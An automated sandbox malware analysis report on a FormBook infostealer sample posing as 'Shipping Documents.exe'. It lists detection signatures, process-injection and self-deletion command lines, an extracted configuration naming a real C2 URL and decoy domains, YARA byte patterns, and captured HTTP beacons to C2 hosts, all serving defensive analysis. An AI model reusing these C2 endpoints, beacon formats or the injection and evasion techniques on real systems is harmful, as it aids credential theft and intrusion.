Analysis Report 202139769574 Shipping Documents.exe

Overview

General Information

Sample Name: 202139769574 Shipping Documents.exe
Analysis ID: 403523
MD5: eee5f618718bc8237bb9c7a48154cf1a
SHA1: 84dc873f65dc9e86978944d1adddb762efcf2631
SHA256: cc7b066e0fa912d406c27790458ad6feb171b27275b6e3fe46b7a7574da7bfce
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • 202139769574 Shipping Documents.exe (PID: 6728 cmdline: 'C:\Users\user\Desktop\202139769574 Shipping Documents.exe' MD5: EEE5F618718BC8237BB9C7A48154CF1A)
    • 202139769574 Shipping Documents.exe (PID: 6808 cmdline: 'C:\Users\user\Desktop\202139769574 Shipping Documents.exe' MD5: EEE5F618718BC8237BB9C7A48154CF1A)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • mstsc.exe (PID: 6488 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 2412003BE253A515C620CE4890F3D8F3)
          • cmd.exe (PID: 5892 cmdline: /c del 'C:\Users\user\Desktop\202139769574 Shipping Documents.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.magnumopuspro.com/nyr/"], "decoy": ["anemone-vintage.com", "ironcitytools.com", "joshandmatthew.com", "breathtakingscenery.photos", "karabakh-terror.com", "micahelgall.com", "entretiendesterrasses.com", "mhgholdings.com", "blewm.com", "sidewalknotary.com", "ytrs-elec.com", "danhpham.com", "ma21cle2henz.xyz", "lotusforlease.com", "shipleyphotoandfilm.com", "bulktool.xyz", "ouedzmala.com", "yichengvpr.com", "connectmygames.com", "chjcsc.com", "dope-chocolate.com", "tacowench.com", "projectsbay.com", "xn--pgboc92d.com", "royaldropofoil.com", "ranguanglian.club", "mobilne-kucice.com", "buytsycon.com", "goiasbets.net", "blpetroleum.com", "starrealms.net", "exclusiveflooringcollection.com", "kudalive.com", "tienda-sky.com", "drillinginsider.info", "theglasshousenyc.com", "vietnammoi.xyz", "walterbenicio.com", "zoomtvliveshows.xyz", "boujiehoodbaby.com", "yzyangyu.com", "exploreecetera.com", "sycord.com", "waykifood.com", "shadingconsultancy.com", "precedentai.net", "linhanhkitchen.com", "expekt24.com", "socialdating24.com", "lubvim.com", "floryi.com", "alerist.com", "maluss.com", "hitbbq.com", "alerrandrotattoo.com", "algoplayer.com", "idahooutsiders.com", "qygmuakhk.club", "neverpossible.com", "winparadigm.com", "toughdecorative.com", "yourbuildmedia.com", "summercrowd.com", "josemvazquez.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
2.1.202139769574 Shipping Documents.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.1.202139769574 Shipping Documents.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.1.202139769574 Shipping Documents.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
2.2.202139769574 Shipping Documents.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.202139769574 Shipping Documents.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.magnumopuspro.com/nyr/"], "decoy": ["anemone-vintage.com", "ironcitytools.com", "joshandmatthew.com", "breathtakingscenery.photos", "karabakh-terror.com", "micahelgall.com", "entretiendesterrasses.com", "mhgholdings.com", "blewm.com", "sidewalknotary.com", "ytrs-elec.com", "danhpham.com", "ma21cle2henz.xyz", "lotusforlease.com", "shipleyphotoandfilm.com", "bulktool.xyz", "ouedzmala.com", "yichengvpr.com", "connectmygames.com", "chjcsc.com", "dope-chocolate.com", "tacowench.com", "projectsbay.com", "xn--pgboc92d.com", "royaldropofoil.com", "ranguanglian.club", "mobilne-kucice.com", "buytsycon.com", "goiasbets.net", "blpetroleum.com", "starrealms.net", "exclusiveflooringcollection.com", "kudalive.com", "tienda-sky.com", "drillinginsider.info", "theglasshousenyc.com", "vietnammoi.xyz", "walterbenicio.com", "zoomtvliveshows.xyz", "boujiehoodbaby.com", "yzyangyu.com", "exploreecetera.com", "sycord.com", "waykifood.com", "shadingconsultancy.com", "precedentai.net", "linhanhkitchen.com", "expekt24.com", "socialdating24.com", "lubvim.com", "floryi.com", "alerist.com", "maluss.com", "hitbbq.com", "alerrandrotattoo.com", "algoplayer.com", "idahooutsiders.com", "qygmuakhk.club", "neverpossible.com", "winparadigm.com", "toughdecorative.com", "yourbuildmedia.com", "summercrowd.com", "josemvazquez.com"]}
Multi AV Scanner detection for submitted file
Source: 202139769574 Shipping Documents.exe | Virustotal: Detection: 33%
Source: 202139769574 Shipping Documents.exe | ReversingLabs: Detection: 31%
Yara detected FormBook
Source: Yara match | File source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.700421859.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.907951301.0000000000C80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000001.650273193.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.907896289.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.1.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.202139769574 Shipping Documents.exe.3070000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.202139769574 Shipping Documents.exe.3070000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: 202139769574 Shipping Documents.exe | Joe Sandbox ML: detected
Source: 1.2.202139769574 Shipping Documents.exe.3070000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.1.202139769574 Shipping Documents.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.202139769574 Shipping Documents.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 202139769574 Shipping Documents.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: 202139769574 Shipping Documents.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000004.00000000.671162738.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: 202139769574 Shipping Documents.exe, 00000001.00000003.646868549.0000000003230000.00000004.00000001.sdmp, 202139769574 Shipping Documents.exe, 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, mstsc.exe, 00000007.00000002.909918766.00000000047C0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: 202139769574 Shipping Documents.exe, mstsc.exe
Source: Binary string: mstsc.pdbGCTL | source: 202139769574 Shipping Documents.exe, 00000002.00000002.701928540.0000000002700000.00000040.00000001.sdmp
Source: Binary string: mstsc.pdb | source: 202139769574 Shipping Documents.exe, 00000002.00000002.701928540.0000000002700000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb | source: explorer.exe, 00000004.00000000.671162738.0000000005A00000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe | Code function: 1_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe | Code function: 1_2_0040659C FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe | Code function: 1_2_004027A1 FindFirstFileA,
Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe | Code function: 4x nop then pop esi
Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4x nop then pop edi

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.magnumopuspro.com/nyr/
Source: global traffic | HTTP traffic detected: GET /nyr/?tVZl=MKniHD/KKNZ944A0QkseLq559MRPs5jQaAqVav9SZ3PAwf03LQBPNZ+ImXhjCplVxvzR&U4kp=NtxHhLZ8S6kT5jw HTTP/1.1
  Host: www.maluss.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected: GET /nyr/?tVZl=EDKKYtZbbvwE4Q/e7xe/ld4gtfmRUWoVn+FtgOYbXYxqqFBCU6VSMnG1GKc/0KEvkVST&U4kp=NtxHhLZ8S6kT5jw HTTP/1.1
  Host: www.exclusiveflooringcollection.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: Joe Sandbox View | IP Address: 198.185.159.144
Source: Joe Sandbox View | IP Address: 23.227.38.74
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: unknown | DNS traffic detected: queries for: www.magnumopuspro.com
Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: 202139769574 Shipping Documents.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: 202139769574 Shipping Documents.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000004.00000002.909702700.0000000002B50000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe | Code function: 1_2_0040548D GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.700421859.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.907951301.0000000000C80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000001.650273193.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.907896289.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.1.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.202139769574 Shipping Documents.exe.3070000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.202139769574 Shipping Documents.exe.3070000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.700421859.00000000009D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.700421859.00000000009D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.907951301.0000000000C80000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.907951301.0000000000C80000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000002.00000001.650273193.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000001.650273193.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.907896289.0000000000A20000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.907896289.0000000000A20000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 2.1.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.1.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 2.2.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.2.202139769574 Shipping Documents.exe.3070000.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.202139769574 Shipping Documents.exe.3070000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.2.202139769574 Shipping Documents.exe.3070000.3.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.202139769574 Shipping Documents.exe.3070000.3.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 2.1.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.1.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 2.2.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Executable has a suspicious name (potential lure to open the executable)
Source: 202139769574 Shipping Documents.exe | Static file information: Suspicious name
Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: 202139769574 Shipping Documents.exe
Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe | Code function: 2_2_00419D60 NtCreateFile,
Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe | Code function: 2_2_00419E10 NtReadFile,
Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe | Code function: 2_2_00419E90 NtClose,
Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe | Code function: 2_2_00419F40 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe | Code function: 2_2_00419D5A NtCreateFile,
Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe | Code function: 2_2_00AF98F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe | Code function: 2_2_00AF9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe | Code function: 2_2_00AF9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe | Code function: 2_2_00AF99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe | Code function: 2_2_00AF9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe | Code function: 2_2_00AF9A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe | Code function: 2_2_00AF9A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe | Code function: 2_2_00AF9A50 NtCreateFile,LdrInitializeThunk,
